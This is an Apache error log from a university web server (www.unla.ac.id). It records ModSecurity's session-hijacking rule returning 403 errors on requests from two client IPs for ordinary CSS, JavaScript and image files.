[Mon Aug 28 08:10:51.783367 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv0G8Co-f0AAJSr2uIAAAAO"]
[Mon Aug 28 08:10:51.792382 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv0G8Co-f0AAJU0qa4AAAAD"]
[Mon Aug 28 08:10:51.793239 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv0G8Co-f0AAJSxYy4AAAAH"]
[Mon Aug 28 08:10:51.802613 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv0G8Co-f0AAJOr97wAAAAL"]
[Mon Aug 28 08:10:51.804979 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv0G8Co-f0AAJWfZHcAAAAI"]
[Mon Aug 28 08:10:51.875518 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOv0G8Co-f0AAJKjZ-EAAAAG"]
[Mon Aug 28 08:10:51.906426 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/deny_haspada.jpg"] [unique_id "ZOv0G8Co-f0AAJSr2uMAAAAO"]
[Mon Aug 28 08:10:51.938463 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Pas_Foto.jpg"] [unique_id "ZOv0G8Co-f0AAJSxYy8AAAAH"]
[Mon Aug 28 08:10:51.973121 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Msn-Buddy-web-icon.png"] [unique_id "ZOv0G8Co-f0AAJWfZHgAAAAI"]
[Mon Aug 28 08:10:51.975290 2023] [:error] [pid 38302] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/IMG_20160613_100811.jpg"] [unique_id "ZOv0G8Co-f0AAJWeoSwAAAAF"]
[Mon Aug 28 08:10:51.981209 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv0G8Co-f0AAJUGIVsAAAAC"]
[Mon Aug 28 08:10:51.981370 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv0G8Co-f0AAJKjZ-IAAAAG"]
[Mon Aug 28 08:10:51.983791 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv0G8Co-f0AAJUFNTkAAAAA"]
[Mon Aug 28 08:10:51.984045 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv0G8Co-f0AAJU0qa8AAAAD"]
[Mon Aug 28 08:10:52.004187 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOv0HMCo-f0AAJSr2uQAAAAO"]
[Mon Aug 28 08:10:52.006373 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv0HMCo-f0AAJWfZHkAAAAI"]
[Mon Aug 28 08:10:52.009099 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv0HMCo-f0AAJUFNToAAAAA"]
[Mon Aug 28 08:10:52.009143 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv0HMCo-f0AAJU0qbAAAAAD"]
[Mon Aug 28 08:10:52.014963 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv0HMCo-f0AAJKjZ-MAAAAG"]
[Mon Aug 28 08:10:52.023887 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv0HMCo-f0AAJUGIVwAAAAC"]
[Mon Aug 28 08:10:52.057289 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv0HMCo-f0AAJWfZHoAAAAI"]
[Mon Aug 28 08:10:52.135102 2023] [:error] [pid 38302] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOv0HMCo-f0AAJWeoS0AAAAF"]
[Mon Aug 28 08:10:53.005549 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0HcCo-f0AAJSr2uUAAAAO"]
[Mon Aug 28 08:12:06.572083 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv0ZsCo-f0AAJU0qcAAAAAD"]
[Mon Aug 28 08:12:06.572660 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv0ZsCo-f0AAJUz@nMAAAAM"]
[Mon Aug 28 08:12:06.746922 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv0ZsCo-f0AAJSxYz8AAAAH"]
[Mon Aug 28 08:12:06.760368 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv0ZsCo-f0AAJKjZ-0AAAAG"]
[Mon Aug 28 08:12:06.761420 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv0ZsCo-f0AAJWfZIsAAAAI"]
[Mon Aug 28 08:12:06.767433 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv0ZsCo-f0AAJOr980AAAAL"]
[Mon Aug 28 08:12:06.923750 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0ZsCo-f0AAJWeoTgAAAAF"]
[Mon Aug 28 08:12:07.659350 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0Z8Co-f0AAJUz@nQAAAAM"]
[Mon Aug 28 08:12:07.705676 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0Z8Co-f0AAJOr984AAAAL"]
[Mon Aug 28 08:12:07.743216 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0Z8Co-f0AAJSr2vIAAAAO"]
[Mon Aug 28 08:12:07.824801 2023] [:error] [pid 38150] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0Z8Co-f0AAJUGIWsAAAAC"]
[Mon Aug 28 08:12:07.836200 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0Z8Co-f0AAJWeoTkAAAAF"]
[Mon Aug 28 08:12:07.838797 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0Z8Co-f0AAJSr2vMAAAAO"]
[Mon Aug 28 08:12:07.841539 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0Z8Co-f0AAJKjZ-4AAAAG"]
[Mon Aug 28 08:12:07.932143 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0Z8Co-f0AAJSxY0AAAAAH"]
[Mon Aug 28 08:12:07.979389 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0Z8Co-f0AAJWfZIwAAAAI"]
[Mon Aug 28 08:12:07.994927 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv0Z8Co-f0AAJOr988AAAAL"]
[Mon Aug 28 08:12:07.995336 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv0Z8Co-f0AAJUz@nUAAAAM"]
[Mon Aug 28 08:12:07.996446 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv0Z8Co-f0AAJSxY0EAAAAH"]
[Mon Aug 28 08:12:08.091675 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv0aMCo-f0AAJKjZ-8AAAAG"]
[Mon Aug 28 08:12:08.092630 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv0aMCo-f0AAJTincEAAAAE"]
[Mon Aug 28 08:12:08.099965 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv0aMCo-f0AAJSr2vQAAAAO"]
[Mon Aug 28 08:12:08.154740 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv0aMCo-f0AAJUz@nYAAAAM"]
[Mon Aug 28 08:12:08.169504 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv0aMCo-f0AAJWfZI0AAAAI"]
[Mon Aug 28 08:12:08.171404 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv0aMCo-f0AAJU0qcIAAAAD"]
[Mon Aug 28 08:12:08.232692 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv0aMCo-f0AAJSxY0IAAAAH"]
[Mon Aug 28 08:12:08.250803 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv0aMCo-f0AAJUz@ncAAAAM"]
[Mon Aug 28 08:12:08.250917 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv0aMCo-f0AAJOr99AAAAAL"]
[Mon Aug 28 08:12:08.253756 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv0aMCo-f0AAJSr2vUAAAAO"]
[Mon Aug 28 08:12:08.314671 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv0aMCo-f0AAJU0qcMAAAAD"]
[Mon Aug 28 08:12:08.316060 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv0aMCo-f0AAJKjaAAAAAAG"]
[Mon Aug 28 08:12:08.316438 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv0aMCo-f0AAJSxY0MAAAAH"]
[Mon Aug 28 08:12:08.379708 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv0aMCo-f0AAJOr99EAAAAL"]
[Mon Aug 28 08:12:08.383185 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv0aMCo-f0AAJTincIAAAAE"]
[Mon Aug 28 08:12:08.383280 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv0aMCo-f0AAJUz@ngAAAAM"]
[Mon Aug 28 08:12:08.460922 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv0aMCo-f0AAJWeoToAAAAF"]
[Mon Aug 28 08:12:08.464303 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0aMCo-f0AAJU0qcQAAAAD"]
[Mon Aug 28 08:12:08.464549 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv0aMCo-f0AAJOr99IAAAAL"]
